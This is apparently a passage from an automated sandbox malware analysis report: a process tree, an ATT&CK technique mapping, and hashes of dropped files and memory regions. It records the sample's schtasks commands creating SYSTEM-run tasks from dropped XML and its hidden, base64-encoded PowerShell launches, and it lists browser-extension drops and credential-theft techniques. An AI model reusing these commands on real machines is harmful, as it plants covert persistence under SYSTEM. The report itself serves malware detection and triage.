- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "GqmqubHZBeiIxpo"
  2⤵
  PID:2240
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GqmqubHZBeiIxpo"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:928
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xVzozZXYwkkdWg" /F /xml "C:\Program Files (x86)\CMKMbRFSZeNU2\FswNVpR.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:540
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AGouOwHOLlnps2" /F /xml "C:\ProgramData\UQYVlFmkpVlhWwVB\hUZKLbj.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "QARjdqhHkeUSJySsU2" /F /xml "C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\fQKBjnt.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2164
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YIKgGKXxRbHNIaIyYyL2" /F /xml "C:\Program Files (x86)\JXqrxIFSrhCmC\bNBPzON.xml" /RU "SYSTEM"
  2⤵
  - System Location Discovery: System Language Discovery
  - Scheduled Task/Job: Scheduled Task
  PID:1736
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 268
  2⤵
  - Program crash
  PID:2220

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:108

C:\Windows\system32\taskeng.exe
taskeng.exe {8DE40DAF-A971-4820-BE34-E128129F0FFD} S-1-5-21-457978338-2990298471-2379561640-1000:WOUOSVRD\Admin:Interactive:[1]
1⤵
PID:2056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:588
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2000

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1692

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:524

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\CMKMbRFSZeNU2\FswNVpR.xml

Filesize
2KB

MD5
3a69d116428b6aa2d20fb19d8fb2a50d

SHA1
0d93900ad02ce0d15c2d29e0f0c0d9878bdcb653

SHA256
8f4f50929a5338a4f350b754146a2d5d88c63520e8f0cba982f18e654a794964

SHA512
7be2aa547e47f3bbfaa8f23e0023e6bbe755ee975dfb57be8eced16c2537f4595eb336a55bfc9280b18461347f1f3bbefaaa3cbc81f9653f9ecd0de160cdfb67

Download Submit
C:\Program Files (x86)\JXqrxIFSrhCmC\bNBPzON.xml

Filesize
2KB

MD5
d89ca36ceb5ca717fc6b1c89f21419a7

SHA1
76623cfb48005c5782429684e9c94bd4b256fb5a

SHA256
5f3b31620f7f2f2c420c6e8cbf5bcdbe76cf4b6f6424a4e56ca7685d3a3f9542

SHA512
1dbb06b7ed6248cef51d06f7bd4c9655c64dd96b678a8a0722546e877a7c7c5f616e7caf6b1b9bcf13ed60a12c4448c071d3a0278d68320bc98129a9185384a3

Download Submit
C:\Program Files (x86)\WxPudDgYHAKHzPDhsOR\fQKBjnt.xml

Filesize
2KB

MD5
ca446e2120ab76c28ea3718f3bccbaf2

SHA1
25d071bda110c73afef80ffed2dc339d4979cdc7

SHA256
6ebd3e54701a8251594408563ab02554f3589d73e3f381864f37e54c4dea815c

SHA512
78d67502017124ad48e8216ceef6eb9b6ab8142bd93bbab0467dffccd7786b1598156b38300ef29b02bb132aca0585af3788728fc7cded531e3337016ce01a36

Download Submit
C:\Program Files (x86)\YjQMAHbWU\UvHLSvA.xml

Filesize
2KB

MD5
b9753488a2ea1237fcf075ecc1b060bd

SHA1
2e1cf3eddc113b10b928c0b03df94101958539df

SHA256
c4634e712d03c5da1559027eda58132f04d0e00f1b2ae6b151648622d7df0705

SHA512
cfdfe57d24a232f2ef2540d723202841e36fbff802648ee33ca006a92d741e9831ff9ec92b3176684c9922ec1e71ce093066d8c4d1169fc9544e161391f5396e

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{17F63D03-641A-4482-B2EB-067FF4457D6B}.xpi

Filesize
644KB

MD5
9b5a3d10abb187b9de96650328194b9c

SHA1
3980d277fd56776a3cdc81133ca61da9af04f4ad

SHA256
24b42fae4c6cf9b6a6a4d05676b04ea68b4f34745e8163ac7ef0b8dd5e88fca2

SHA512
6d7f04dae8ddfb51c305dfc9097305b92633fef05aebcdddd296d3804c4b58bf573312a5768b09fe08f78c9b0a224500b219a43710ebf6cc3db46c901440ad1a

Download Submit
C:\ProgramData\UQYVlFmkpVlhWwVB\hUZKLbj.xml

Filesize
2KB

MD5
1601000c19b7091262a8ff80b7e8450d

SHA1
5ea9ef1b72b426c883c66441b49dde99e6692fe4

SHA256
22183f59047655b11215a37550439f53f53952f6b408b7728e401b7910ff5d45

SHA512
75e9c4a3abd696b88638d2208dbcc4855931b781295d7b88cad341db1c448a462cebc483747d801ff002f2b3da1f6361897f9c026d16901876a39c942f0b0e2b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fakaldmaepeakkcjljcakjphgknbbbmp\1.1_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2N8QFW35J4BUDKHXVF97.temp

Filesize
7KB

MD5
39bbb96e609b9c73be35b0853346695a

SHA1
e1113a7f3a1b5543fe127d37c14872590cf50cd6

SHA256
246d5dd59792fba627a536b3984833ea4f43f4ab0344af3e0109155dda566ae1

SHA512
b51420904fe1901dbd53c60563bdf47f71d8abbddb840040d3eaaab6c352d9e105046d6fff82232b3251979265b887306c1461a081d073a3b3ee0ddc86a09757

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
40bb53a688be37c43996bc63f4f560cf

SHA1
9985906200ac8ebc7a1435ef9e9de831f97c8778

SHA256
6162e1b75733313e36fb0b3cf573f0cdd874f6565a0df67d8c25af446fc7af30

SHA512
092b76033b5efd29de2009fc6a3d359db750a47d982315d431b1ce8c3f28eeb54a6d137be8fe46cbf1b1908e8e2e0f10daef4def8e8f7c923cc1e90037457be7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
3a33d6474cad3d71299f1c35a7cbe6b1

SHA1
ca79b05d4017b1e2993e6aa276cd16ad428e4111

SHA256
686fec1c8e004fc91e1e66dff9fefb2adec418c145f41c2a8c39c8a78a8efd4c

SHA512
bfc10f91d13a2f76c01eddd3bb49274ec8f5478db0bfeef338fb7672aab33312421dfb4fb4caed785128378574104970e995e89d5cc000816556716a6d63d164

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
e57b1436677766558440b602ae2b5f71

SHA1
3a2f0f892f54053663c581c2ac49316ac89fdbbb

SHA256
db3f011dc39fb57247cab3870cdb1fd39df11234318bcabfa1b1d3debad019ce

SHA512
7a31c3a35043b700442ddef91d0575d41e325b4e4acf6282d3b31d252097eee97aa1f0350f6a3b763052bb2655057e470de405cd9f245ee5ce7b66e4877e4531

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dt6wk0rq.default-release\prefs.js

Filesize
6KB

MD5
829978917152bb5ebafa2fa146932218

SHA1
341c01313c8f364ed4a239b5216bdf55819b7b97

SHA256
5b99fdd91784191b59836188362ce6619eabf0f280e4dd88dcbdd789aeb54780

SHA512
68419b30149f4c6a775881215adfe496fff429b7b3a85be6b650302a197eeb5a7fea3dfe5e4f9024dcd5fdf5b59c96a558ce1ebe02eb88dc23a0d0d59f26f7d8

Download Submit
C:\Windows\Temp\YIXdnjwIixpMFthL\FNJJDCvD\QpWreiYGzIDLTOYE.wsf

Filesize
9KB

MD5
c69e98385d152336cd2c16919a19570e

SHA1
7892a5c2c2a27b77bd674dd44927950711b34b4c

SHA256
acb9b5e0a26df1adc313980ead66c5ca9e945f34b1a7f286cf1db07dad1a61d0

SHA512
c8bbdb1304ddbb78c4047c8c342c86581d9d7a2ce8700e3c17bbf41579905cba46da0e9a9b6d81abb047399a4a887daf011035c4fb6388a27ff8863450d09ee1

Download Submit
memory/588-41-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/1372-14-0x00000000022F0000-0x00000000022F8000-memory.dmp

Filesize
32KB

Download
memory/1372-13-0x000000001B3C0000-0x000000001B6A2000-memory.dmp

Filesize
2.9MB

Download
memory/1424-88-0x0000000002E00000-0x0000000002E64000-memory.dmp

Filesize
400KB

Download
memory/1424-51-0x0000000002F50000-0x0000000002FD5000-memory.dmp

Filesize
532KB

Download
memory/1424-0-0x0000000000190000-0x0000000000846000-memory.dmp

Filesize
6.7MB

Download
memory/1424-15-0x0000000000190000-0x0000000000846000-memory.dmp

Filesize
6.7MB

Download
memory/1424-5-0x0000000010000000-0x0000000011A13000-memory.dmp

Filesize
26.1MB

Download
memory/1424-297-0x0000000000190000-0x0000000000846000-memory.dmp

Filesize
6.7MB

Download
memory/2428-25-0x0000000002520000-0x0000000002528000-memory.dmp

Filesize
32KB

Download
memory/2428-24-0x000000001B350000-0x000000001B632000-memory.dmp

Filesize
2.9MB

Download